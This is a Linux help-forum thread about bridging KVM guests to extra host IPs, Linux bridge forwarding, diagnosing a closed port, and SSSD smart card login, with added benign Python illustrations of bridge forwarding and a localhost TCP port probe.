I considered spoofing the MACs but was low on time and unsure if I was way off base and it wouldn't work. I might give that a try when I'm ready to play around with it again!

What are the network settings of your host server? Those might give you an idea what settings the VMs should have.

Mr Shiny Pants
Nov 12, 2012


Tea Bone posted:

You would think so, but apparently they can't (or won't) reassign them. It was probably naive of me not to check before purchasing them, but it seemed a logical conclusion that the use of multiple IPs would be for bridging them to VMs.

I considered spoofing the MACs but was low on time and unsure if I was way off base and it wouldn't work. I might give that a try when I'm ready to play around with it again!

Huh? This is weird, why won't they? How exactly did you get these IP addresses?

You can use KVM to set a MAC address on a virtual NIC, so that should just work.

D. Ebdrup
Mar 13, 2009


Tea Bone posted:

about software defined networking and bridges
This is mostly a tangential issue, but it's something you should learn from the get-go because I've met many people who don't understand why their systems run sub-optimally as a result of this quite common misconfiguration.
The only time it's a good idea to set an IP address on a bridge device is when the bridge host needs an IP address, because bridges are meant to be transparent devices and IP addresses are meant to belong to end-points (since TCP is an end-to-end protocol), and network stack code is designed around this concept.
This is also the reason why checksum/large receive/segmentation offloading technically speaking breaks the end-to-end principle of TCP and should be avoided for firewalls, but that's a whole other can of worms.

other people
Jun 27, 2004
Associate Christ

D. Ebdrup posted:

This is mostly a tangential issue, but it's something you should learn from the get-go because I've met many people who don't understand why their systems run sub-optimally as a result of this quite common misconfiguration.
The only time it's a good idea to set an IP address on a bridge device is when the bridge host needs an IP address, because bridges are meant to be transparent devices and IP addresses are meant to belong to end-points (since TCP is an end-to-end protocol), and network stack code is designed around this concept.

Come again?

The linux kernel bridge module in TYOOL 2020 is effectively a virtual switch. When a bridge is created on a system the new virtual switch always begins with one "port" connected and that's the netdev (typically named br0 or whatever) which "plugs" the system into the virtual switch. From the point of view of the packet switching functionality of the bridge module, this port is just like any other that it may choose to forward or flood frames to. Whether you assign an IP address to it or not has no impact on performance of frames traversing the bridge.

Unicast frames hitting the bridge which do not have a destination layer 2 address matching the br0 interface are not going to be delivered to it. Frames which do not match anything in the FDB are going to be flooded to all ports, including br0, regardless of whether br0 has an IP assigned. So in the end, whether that device has a layer 3 assigned makes no difference.



Anyway, in Tea Bone's case, it sounds like his system only has a single physical connection to a network, so if he wants his hypervisor and its guests to all be reachable at L3 on that network then a bridge (with IP) on the hypervisor is the most obvious solution. He can't really avoid it without separate physical connections or some pretty wacky packet mangling.
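
To illustrate the forwarding rules other people describes (learn the source MAC on the ingress port, deliver known unicast to one port, flood broadcast and unknown unicast to every other port including br0), here is an added Python model, not code from the thread or from the kernel's bridge module. Port names and MAC addresses are constructed for the walk-through; the model deliberately has no notion of IP addresses because the forwarding decision does not depend on whether br0 has one.

```python
from typing import Dict, List

BROADCAST = "ff:ff:ff:ff:ff:ff"


class LearningBridge:
    """Minimal model of the Linux bridge's per-frame forwarding decision.

    Ports are just names; 'br0' is the port that plugs the host's own network stack into
    the virtual switch and is treated like any other port. VLANs and STP are left out.
    """

    def __init__(self, ports: List[str]) -> None:
        self.ports = list(ports)
        self.fdb: Dict[str, str] = {}  # MAC -> port it was last seen on

    def receive(self, in_port: str, src: str, dst: str) -> List[str]:
        """Return the ports a frame is forwarded to: learn src, then forward or flood."""
        self.fdb[src] = in_port
        if dst != BROADCAST and dst in self.fdb:
            out = self.fdb[dst]
            return [] if out == in_port else [out]   # known unicast: one port, or dropped if same port
        return [p for p in self.ports if p != in_port]  # broadcast / unknown unicast: flood


def bridge_demo() -> Dict[str, List[str]]:
    """Constructed walk-through: a guest on vnet0 talking to a gateway out on eth0."""
    guest, gateway, stranger = "52:54:00:aa:bb:01", "00:11:22:33:44:55", "de:ad:be:ef:00:01"
    br = LearningBridge(["br0", "eth0", "vnet0"])
    return {
        # Guest ARPs for the gateway: broadcast, so br0 and eth0 both see it.
        "guest_arp_request": br.receive("vnet0", guest, BROADCAST),
        # Gateway replies to the guest's MAC, which is now in the FDB: only vnet0 gets it.
        "gateway_arp_reply": br.receive("eth0", gateway, guest),
        # Guest traffic to the gateway goes straight to eth0; br0 never sees it.
        "guest_to_gateway": br.receive("vnet0", guest, gateway),
        # A frame for a MAC nobody has learned is flooded everywhere, br0 included.
        "unknown_unicast": br.receive("eth0", stranger, "00:00:5e:00:53:ff"),
    }


if __name__ == "__main__":
    for step, ports in bridge_demo().items():
        print(f"{step}: forwarded to {ports}")
```

The practical consequence for the hypervisor is the one the post states: giving br0 an address changes what the host's own stack will answer to, not how many frames cross the bridge, so a management IP on br0 costs nothing in forwarding terms. It also shows why a guest on the bridge can sniff every broadcast and every unknown-unicast frame the physical port floods in, which matters once untrusted VMs share a bridge.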

Tea Bone
Feb 18, 2011

I'm going for gasps.

Mr Shiny Pants posted:

Huh? This is weird, why won't they? How exactly did you get these IP addresses?

You can use KVM to set a MAC address on a virtual NIC, so that should just work.

I purchased "Additional IPs" along with the server when I signed up.

As to why they won't, honestly, I don't know. I don't think their support guys are that clear on the matter either, since it took me 4 rounds of speaking to them before anyone could even tell me the IPs were locked to a MAC. I should have pushed them on it, but by that time I was just relieved to have an answer why things weren't working. It's a "new" model of service plan with the servers and I know they used to change the MACs for the old-style plan, so it might just be teething issues on their end. I might give them yet another call and try to get to the bottom of this later down the line.

Mr Shiny Pants
Nov 12, 2012


Tea Bone posted:

I purchased "Additional IPs" along with the server when I signed up.

As to why they won't, honestly, I don't know. I don't think their support guys are that clear on the matter either, since it took me 4 rounds of speaking to them before anyone could even tell me the IPs were locked to a MAC. I should have pushed them on it, but by that time I was just relieved to have an answer why things weren't working. It's a "new" model of service plan with the servers and I know they used to change the MACs for the old-style plan, so it might just be teething issues on their end. I might give them yet another call and try to get to the bottom of this later down the line.

Sounds like a weird constraint to be honest, especially today when hardware is mostly virtual.

To re-iterate if you get them fixed:

Get one IP on the bridge for management purposes, or on another NIC if you have one, and leave the bridge as is.
Put VMs using Virtual Machine manager on the shared device. I always just use BR0.
Inside the VM OS put the correct networking information on the NIC that is connected to the BR0 interface.

That should do the trick, I have multiple of these setups running with no problems.

RFC2324
Jun 7, 2012

Http 418


Tea Bone posted:

I purchased "Additional IPs" along with the server when I signed up.

As to why they won't, honestly, I don't know. I don't think their support guys are that clear on the matter either, since it took me 4 rounds of speaking to them before anyone could even tell me the IPs were locked to a MAC. I should have pushed them on it, but by that time I was just relieved to have an answer why things weren't working. It's a "new" model of service plan with the servers and I know they used to change the MACs for the old-style plan, so it might just be teething issues on their end. I might give them yet another call and try to get to the bottom of this later down the line.

escalate. they don't have access under the new system, and have management who don't understand the issue

Pablo Bluth
Sep 7, 2007

I've made a huge mistake.


Can anyone recommend a cron-friendly podcast downloader/archiver? I've just tried podget which would do the job if it could do decent file (re)naming.

D. Ebdrup
Mar 13, 2009


Pablo Bluth posted:

Can anyone recommend a cron-friendly podcast downloader/archiver? I've just tried podget which would do the job if it could do decent file (re)naming.
flexget.

Axe-man
Apr 16, 2005

The product of hundreds of hours of scientific investigation and research.

The perfect meatball.


Clapping Larry

Today I got to feel like a big dummy.

I am using a client that uses internal port 5510, and the client wasn't connecting to the server.

Gave a unique path on my firewall for my port still won't work.

Nmap shows the port closed, assumed it was the router and disabled the firewall completely to the server.

Still, nothing.

Finally did a tracepath to and found it just hitting the server and stopping...

I hadn't started the daemon.

D. Ebdrup
Mar 13, 2009


Axe-man posted:

Today I got to feel like a big dummy.

I am using a client that uses internal port 5510, and the client wasn't connecting to the server.

Gave a unique path on my firewall for my port still won't work.

Nmap shows the port closed, assumed it was the router and disabled the firewall completely to the server.

Still, nothing.

Finally did a tracepath to and found it just hitting the server and stopping...

I hadn't started the daemon.
netcat has a -z switch that is immeasurably handy for diagnosing this kind of thing remotely.
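What `nc -z` does under the hood, as an added illustration (not from the thread and not netcat's own code): a TCP probe that tells "closed" (host answered with RST, so nothing is listening, which is exactly the daemon-not-started case above) apart from "filtered" (no answer at all, typically a firewall dropping the SYN). The demo function builds its own listener on 127.0.0.1 so it runs offline.

```python
import socket
from typing import Tuple


def probe_tcp(host: str, port: int, timeout: float = 3.0) -> str:
    """Attempt a TCP handshake and classify the outcome, nc -z style.

    'open'     -> handshake completed, a daemon is listening
    'closed'   -> peer sent RST: reachable, but nothing bound to that port
    'filtered' -> no reply or unreachable: firewall/router dropping the SYN
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "open"
    except ConnectionRefusedError:      # RST came back: checked before the generic OSError
        return "closed"
    except (socket.timeout, OSError):   # timeout, host unreachable, etc.
        return "filtered"


def demo_local() -> Tuple[str, str]:
    """Constructed scenario: probe a port while listening, then after the listener is gone."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))          # let the OS pick a free port
    srv.listen(1)
    port = srv.getsockname()[1]
    while_listening = probe_tcp("127.0.0.1", port)
    srv.close()                         # "daemon" stops: kernel now answers with RST
    after_close = probe_tcp("127.0.0.1", port)
    return while_listening, after_close


if __name__ == "__main__":
    print(demo_local())                 # ('open', 'closed')
```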


Sheep
Jul 24, 2003


Anyone using smart card logins with CentOS 8? It seems like the new RedHat recommended method is via SSSD, which is great and all, but I'm pretty much at a loss as to how to convert our old pam_pkcs11-based method from CentOS 7 over. Our situation is pretty simple; if the user is able to open pkcs11:id=%01 then that'd be sufficient for authentication on our end, but I'm not really clear on how to configure that within sssd.conf. I've read the topics on RedHat's IDM section as well as the Access article and nothing I do has been able to get so far as even prompting for a PIN.

Our CentOS 7 setup is just pam_pkcs11 with a basic ms mapper and works without any issue at all.

Already confirmed I can query the card and pull certificates via pcsc_scan/p11tool so it's not a reader/card issue, CA certificates have been added to nssdb, and sssd.conf does have pam_cert_auth set to True. It's probably down to the certmap matchrule but even setting it appropriately doesn't seem to help. SSSD's logs are entirely unhelpful even at elevated debug levels and don't even mention the card at all.

Edit: the certmaps page on sssd.io has been the most help as it provides instructions on rewriting the ms mapper.

Sheep fucked around with this message at 01:47 on Sep 16, 2020
